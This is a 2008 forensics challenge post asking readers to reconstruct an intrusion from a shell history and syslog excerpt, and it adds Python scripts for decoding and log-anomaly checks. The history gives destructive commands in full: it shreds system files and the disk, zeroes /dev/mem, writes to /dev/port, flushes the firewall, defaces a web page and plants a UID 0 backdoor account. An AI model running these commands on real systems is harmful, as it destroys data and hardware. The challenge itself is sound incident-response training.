Overview: Hello, challenge fans. Matt Carpenter and I have brewed up a new one for your analysis. The evidence is below. Analyze it and answer our questions. As always, we’ll choose three winners: one technical champ, one creative victor whose answer is technically correct, and one lucky person chosen at random. As you work through this challenge, please observe this very important warning! As they say on TV, DO NOT TRY THIS AT HOME. We’ll go even further by saying, DO NOT TRY IT AT WORK EITHER. The commands included in this challenge are _highly_ destructive, and some of them are hardware specific. They will hose a machine badly. If you insist on testing the commands, at least use a strongly virtualized environment that isolates virtual hardware from physical hardware, and set a snapshot before each command so that you can revert to a pristine state. We wrote the challenge using VMware Workstation, and did not suffer damage to our underlying hosts. However, we cannot guarantee that your VMware experience will match our own. In other words, to borrow from the TV vernacular yet again, YOUR MILEAGE MAY VARY. Furthermore, some so-called "virtualized environments" other than VMware are merely emulators that do not isolate hardware well, nor do they support snapshots. The commands below could damage such environments, so be very careful. You have been warned!
If you can’t answer this challenge 100%, still send something in to qualify as a random winner. This month’s prize is my book, Malware: Fighting Malicious Code, which I authored with Lenny Zeltser. Each winner gets a signed copy.
–Ed Skoudis, Intelguardians
Author, Counter Hack Reloaded
March 2008
It Happened One Friday
By Matt Carpenter and Ed Skoudis
id
unname -a
uname -a
touch /root/test
ls -la /root
rm /root/test
vi /etc/shadow
iptables -F
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -I OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
rm /var/www/htdocs/index.html
echo "I'm so pwned...." > /var/www/htdocs/index.html
echo JiMxNDk3OyYjMTUxMzsmIzE0OTM7JiMxNTA2OyAmIzE0OTI7JiMxNTA0OyYjMTUxMDsmIzE1MTI7 >> /var/www/htdocs/index.html
echo JiMxNDk3OyAmIzE0OTM7JiMxNTAyOyYjMTUwMDsmIzE0OTg7ICYjMTQ5MjsmIzE0OTc7JiMxNDky >> /var/www/htdocs/index.html
echo OyYjMTQ5MzsmIzE0OTE7JiMxNDk3OyYjMTUwMTs= >> /var/www/htdocs/index.html
wget http://localhost/
chmod 666 /var/www/htdocs/index.html
wget http://localhost/
mail -s "S0 pwned!" `nc -l -p 54742` < /var/www/htdocs/index.html
mke2fs -m 0 /dev/ram9
mke2fs -m 0 /dev/ram8
mke2fs -m 0 /dev/ram7
mkdir -p /mnt/rd
mount /dev/ram9 /mnt/rd
mkdir /mnt/rd/usr
mount /dev/ram8 /mnt/rd/usr
mkdir /mnt/rd/lib
mount /dev/ram7 /mnt/rd/lib
mkdir -p /mnt/rd/var/www/htdocs
mkdir -p /mnt/rd/proc
mkdir -p /mnt/rd/dev
mkdir -p /mnt/rd/tmp
cp -ax /var/www/htdocs/index.html /mnt/rd/var/www/htdocs/
vi /tmp/flist.txt
cat /tmp/flist.txt | while read file; do dir=`echo "$file" |sed 's/\/[^/]*$//'` ; mkdir -p /mnt/rd/$dir ; cp -ax $file /mnt/rd/$dir; done
mount --bind /proc /mnt/rd/proc
mount --bind /dev /mnt/rd/dev
mkdir /mnt/rd/oldroot
cd /mnt/rd
pivot_root . oldroot
exec chroot .
cd
cat /etc/shells
chsh -s /bin/sh
shred -u /oldroot/bin/bash
shred -u /oldroot/etc/shadow
find /oldroot/root -type f -ls -exec shred -u {} \;
find /oldroot/home -type f -ls -exec shred -u {} \;
find /oldroot/usr/[a-km-z]* -type f -ls -exec shred -u {} \;
find /oldroot/usr/lib/[a-hj-z]* -type f -ls -exec shred -u {} \;
find /oldroot/var -type f -ls -exec shred -u {} \;
find /oldroot/etc -type f -ls -exec shred -u {} \;
mount
cat /proc/partitions
dumpe2fs -b /dev/sda2
count=1; while [ $count -lt 1000 ]; do echo $count; count=`expr $count + 1`; done >> /tmp/bad1000
mkdir /tmp
count=1; while [ $count -lt 1000 ]; do echo $count; count=`expr $count + 1`; done >> /tmp/bad1000
e2fsck -l /tmp/bad1000 /dev/sda2
dumpe2fs -b /dev/sda2
echo "dirty" > /tmp/dirty
debugfs --help
man debugfs
which man fsck you
debugfs -w -f /tmp/dirty /dev/sda2
ll
ls -la
dmidecode |head 50
dd if=/dev/mem bs=1 skip=946272 count=512 |hexdump -C
dd if=/dev/mem bs=1 skip=1048400 count=176 |hexdump -C
dd if=/dev/zero of=/dev/mem seek=983040 count=65535 bs=1
dd if=/dev/zero of=/dev/mem seek=946272 count=102304 bs=1
printf "\x44\x44\x44\x44" |dd of=/dev/port seek=3324 bs=1
printf "\x80" | dd of=/dev/port seek=178 bs=1
shred /dev/sda
logger Dodge This
dd if=/dev/zero of=/dev/mem
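One piece of the shell history above can be worked safely on any machine: the three strings the attacker echoed into index.html. The first two are exactly 76 characters and only the third carries "=" padding, which is the shape of a single base64 blob wrapped at 76 columns (the default of the base64 utility), so they should be joined before decoding. The decoded bytes are HTML numeric character references, and every code point falls in the Unicode Hebrew letter block. The script below is an added analysis example, not part of the challenge material; it uses only the Python standard library and the three strings exactly as they appear in the history. What the rendered text says is left to the reader, as the question intends.

```python
import base64
import html
import re

# The three base64 strings the attacker echoed into index.html, copied from
# the shell history. Lines 1 and 2 are exactly 76 characters and only line 3
# carries '=' padding: one blob wrapped at 76 columns, the default of `base64`.
B64_LINES = [
    "JiMxNDk3OyYjMTUxMzsmIzE0OTM7JiMxNTA2OyAmIzE0OTI7JiMxNTA0OyYjMTUxMDsmIzE1MTI7",
    "JiMxNDk3OyAmIzE0OTM7JiMxNTAyOyYjMTUwMDsmIzE0OTg7ICYjMTQ5MjsmIzE0OTc7JiMxNDky",
    "OyYjMTQ5MzsmIzE0OTE7JiMxNDk3OyYjMTUwMTs=",
]

HEBREW_BLOCK = (0x05D0, 0x05EA)  # alef .. tav, the 27 Hebrew letters


def decode_wrapped_base64(lines):
    """Join the wrapped lines and decode them as one buffer.

    In the attacker's index.html each fragment sits on its own line, so the
    entity that straddles fragments 2 and 3 ("&#1492" / ";...") is split by a
    newline there. Treating the blob as one buffer restores it.
    """
    blob = "".join(line.strip() for line in lines)
    return base64.b64decode(blob, validate=True).decode("ascii")


def entity_codepoints(text):
    """Return the code points of the numeric character references in text."""
    return [int(num) for num in re.findall(r"&#(\d+);", text)]


def render(text):
    """Turn the character references into the text a browser would display."""
    return html.unescape(text)


def all_hebrew(text):
    """True when every non-space character lies in the Hebrew letter block."""
    lo, hi = HEBREW_BLOCK
    return all(lo <= ord(ch) <= hi for ch in text if ch != " ")


DECODED = decode_wrapped_base64(B64_LINES)

if __name__ == "__main__":
    print(DECODED)
    print(entity_codepoints(DECODED))
    print(render(DECODED), "| hebrew only:", all_hebrew(render(DECODED)))
```

The `validate=True` flag makes the decoder reject anything outside the base64 alphabet, so a stray character left over from copying the history is reported instead of silently skipped.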
Mar 20 05:10:52 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception).
Mar 20 05:41:10 242.229.249.233 syslogd 1.4.1#21ubuntu3: restart.
Mar 20 05:35:00 242.229.249.233 sshd[7564]: Accepted password for owner from 228.229.228.233 port 44156 ssh2
Mar 20 05:35:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for user owner by (uid=0)
Mar 20 05:30:34 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ; USER=root ; COMMAND=/usr/bin/vi /etc/inetd.conf
Mar 20 05:30:54 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ; USER=root ; COMMAND=/etc/init.d/openbsd-inetd stop
Mar 20 05:30:56 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ; USER=root ; COMMAND=/etc/init.d/openbsd-inetd start
Mar 20 05:33:14 242.229.249.233 telnetd[1803]: connect from 228.229.228.233
Mar 20 05:34:24 242.229.249.233 telnetd[6887]: ttloop: retrying
Mar 20 05:34:45 242.229.249.233 su[6913]: Successful su for root by owner
Mar 20 05:34:45 242.229.249.233 su[6913]: + pts/10 owner:root
Mar 20 05:34:45 242.229.249.233 su[6913]: pam_unix(su:session): session opened for user root by owner(uid=1000)
Mar 20 05:35:29 242.229.249.233 telnetd[6887]: child process 6888 exited: 0
Mar 20 05:35:29 242.229.249.233 login[6888]: pam_unix(login:session): session closed for user owner
Mar 20 06:03:14 242.229.249.233 telnetd[1803]: connect from 240.232.249.228
Mar 20 06:04:24 242.229.249.233 telnetd[6887]: ttloop: retrying
Mar 20 06:04:45 242.229.249.233 su[6913]: Successful su for root by owner
Mar 20 06:04:45 242.229.249.233 su[6913]: + pts/10 owner:root
Mar 20 06:04:45 242.229.249.233 su[6913]: pam_unix(su:session): session opened for user root by owner(uid=1000)
Mar 20 06:04:57 242.229.249.233 useradd[6927]: new user: name=luz, UID=0, GID=0, home=/home/luz, shell=/bin/bash
Mar 20 06:05:21 242.229.249.233 passwd[6933]: pam_unix(passwd:chauthtok): password changed for luz
Mar 20 06:05:23 242.229.249.233 su[6913]: pam_unix(su:session): session closed for user root
Mar 20 06:05:29 242.229.249.233 telnetd[6887]: child process 6888 exited: 0
Mar 20 06:05:29 242.229.249.233 login[6888]: pam_unix(login:session): session closed for user owner
Mar 20 06:06:00 242.229.249.233 sshd[7564]: Accepted password for owner from 240.232.249.228 port 44156 ssh2
Mar 20 06:06:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for user luz by (uid=0)
Mar 20 06:27:28 242.229.249.233 postfix/pickup[6046]: 54E38488E8: uid=0 from=<root>
Mar 20 06:27:28 242.229.249.233 postfix/cleanup[6208]: 54E38488E8: message-id=<20080317113539.54E38488E8@humanoid>
Mar 20 06:27:28 242.229.249.233 postfix/qmgr[6047]: 54E38488E8: from=<luz>, size=385, nrcpt=2 (queue active)
Mar 20 06:27:51 242.229.249.233 chsh[11491]: changed user `luz' shell to `/bin/sh'
Mar 20 13:24:16 192.168.255.133 CRON[5703]: Authentication service cannot retrieve authentication info.
Mar 21 05:10:52 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception).
Mar 21 13:02:43 242.229.249.233 luz: Dodge This
Mar 22 05:10:53 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception).
Mar 23 03:31:15 242.229.249.233 syslogd 1.4.1#17ubuntu7: restart.
Mar 23 03:31:16 242.229.249.233 kernel: Inspecting /boot/System.map-2.6.15-27-386
Mar 23 03:31:17 242.229.249.233 kernel: Loaded 23031 symbols from /boot/System.map-2.6.15-27-386.
Mar 23 03:31:17 242.229.249.233 kernel: Symbols match kernel version 2.6.15.
Mar 23 03:31:17 242.229.249.233 kernel: No module symbols loaded - kernel modules not enabled.
Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] Linux version 2.6.15-27-386 (buildd@terranova) (gcc version 4.0.3 (Ubuntu 4.0.3-1ubuntu5)) #1 PREEMPT Sat Sep 16 01:51:59 UTC 2006
Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] BIOS-provided physical RAM map:
Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 0000000000000000 - 000000000009f800 (usable)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000000ca000 - 00000000000cc000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000000dc000 - 0000000000100000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 0000000000100000 - 000000000fef0000 (usable)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000fef0000 - 000000000fefc000 (ACPI data)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000fefc000 - 000000000ff00000 (ACPI NVS)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000ff00000 - 0000000010000000 (usable)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fffe0000 - 0000000100000000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] 0MB HIGHMEM available.
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] 256MB LOWMEM available.
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] found SMP MP-table at 000f6ce0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] On node 0 totalpages: 65536
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMA zone: 4096 pages, LIFO batch:0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMA32 zone: 0 pages, LIFO batch:0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] Normal zone: 61440 pages, LIFO batch:15
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] HighMem zone: 0 pages, LIFO batch:0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMI present.
Mar 23 03:31:20 242.229.249.233 kernel: [17179700.268000] apm: BIOS version 1.2 Flags 0x03 (Driver version 1.16ac)
Mar 23 03:31:20 242.229.249.233 kernel: [17179700.272000] apm: overridden by ACPI.
Mar 23 03:31:29 242.229.249.233 sshd[4030]: Server listening on :: port 22.
Mar 23 03:31:31 242.229.249.233 anacron[4131]: Anacron 2.3 started on 2008-03-23
Mar 23 03:31:33 242.229.249.233 anacron[4131]: Normal exit (0 jobs run)
Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4156]: (CRON) INFO (pidfile fd = 3)
Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4157]: (CRON) STARTUP (fork ok)
Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4157]: (CRON) INFO (Running @reboot jobs)
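Part of the log review the question asks for can be mechanised. The Python below is an added example, not part of the challenge material: it parses a subset of the syslog lines above (copied as printed there; the year 2008 is assumed because syslog timestamps carry none) and runs four checks a responder would apply to a loghost's copy of a compromised box's syslog: timestamps that run backwards for one host, a useradd that creates a second UID 0 account, an sshd login accepted for one user whose PAM session opens for another, and the same program and PID pair reappearing far apart in time. Findings come back as (kind, host, detail) tuples so they can be asserted on or fed to whatever case notes you keep.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a subset of the syslog excerpt above, copied as printed.
LOG = """\
Mar 20 05:41:10 242.229.249.233 syslogd 1.4.1#21ubuntu3: restart.
Mar 20 05:35:00 242.229.249.233 sshd[7564]: Accepted password for owner from 228.229.228.233 port 44156 ssh2
Mar 20 05:35:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for user owner by (uid=0)
Mar 20 05:34:45 242.229.249.233 su[6913]: Successful su for root by owner
Mar 20 06:04:45 242.229.249.233 su[6913]: Successful su for root by owner
Mar 20 06:04:57 242.229.249.233 useradd[6927]: new user: name=luz, UID=0, GID=0, home=/home/luz, shell=/bin/bash
Mar 20 06:06:00 242.229.249.233 sshd[7564]: Accepted password for owner from 240.232.249.228 port 44156 ssh2
Mar 20 06:06:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for user luz by (uid=0)
Mar 21 13:02:43 242.229.249.233 luz: Dodge This
"""

YEAR = 2008  # assumed: BSD syslog timestamps have no year field

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^\s\[:]+)(?:\[(?P<pid>\d+)\])?:? ?(?P<msg>.*)$"
)


def parse(log):
    """Split syslog text into dicts with ts (datetime), host, prog, pid, msg."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(f"{YEAR} {e['ts']}", "%Y %b %d %H:%M:%S")
        events.append(e)
    return events


def find_anomalies(events):
    """Return (kind, host, detail) tuples for four signs of tampering."""
    findings = []

    # 1. Timestamps running backwards on one host. A loghost keeps entries in
    #    arrival order, so a regression means the sender's clock moved or the
    #    entries were rewritten after the fact.
    last_seen = {}
    for e in events:
        prev = last_seen.get(e["host"])
        if prev is not None and e["ts"] < prev:
            findings.append(("time_regression", e["host"], e["ts"].strftime("%b %d %H:%M:%S")))
        last_seen[e["host"]] = e["ts"]

    # 2. A new account created with UID 0 under a name other than root.
    for e in events:
        if e["prog"] == "useradd":
            m = re.search(r"name=(\w+), UID=(\d+)", e["msg"])
            if m and m.group(2) == "0" and m.group(1) != "root":
                findings.append(("uid0_account", e["host"], m.group(1)))

    # 3. sshd authenticated one user but PAM opened the session for another.
    pending = None
    for e in events:
        if e["prog"] != "sshd":
            continue
        m = re.match(r"Accepted \S+ for (\S+) from", e["msg"])
        if m:
            pending = m.group(1)
            continue
        m = re.search(r"session opened for user (\S+)", e["msg"])
        if m:
            if pending and m.group(1) != pending:
                findings.append(("session_user_mismatch", e["host"], f"{pending}->{m.group(1)}"))
            pending = None

    # 4. The same program/PID pair seen far apart in time. PIDs are recycled,
    #    but the same daemon getting the same PID back half an hour later with
    #    near-identical text is what copy-edited log entries look like.
    by_pid = defaultdict(list)
    for e in events:
        if e["pid"]:
            by_pid[(e["host"], e["prog"], e["pid"])].append(e["ts"])
    for (host, prog, pid), stamps in sorted(by_pid.items()):
        if max(stamps) - min(stamps) > timedelta(minutes=10):
            findings.append(("pid_reuse", host, f"{prog}[{pid}]"))

    return findings


FINDINGS = find_anomalies(parse(LOG))

if __name__ == "__main__":
    for kind, host, detail in FINDINGS:
        print(f"{kind:22} {host:16} {detail}")
```

The checks are deliberately narrow: each fires only on a pattern visible in the excerpt, and each is cheap enough to run over a full day of a loghost's output. The ten-minute window in the PID check is a tunable judgement call, not a rule.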
Question:
1) What happened… and why?
Submit your answers to skillz0308@ethicalhacker.net with the subject line "Skillz Submission" by Sunday April 20, 2008 for a chance to win an autographed copy of my book, Malware: Fighting Malicious Code. The autograph will congratulate you on your prowess in mastering this challenge! We’ll choose three winners, as usual, one in each of the three following categories:
– Best Technical Answer
– Best Creative Answer (that is also technically correct)
– Random Draw (Anyone can win, so send in a response even if you have no faith in your ability to win)
Ed Skoudis
Author, Counter Hack Reloaded
SANS Institute Fellow
Co-founder, Intelguardians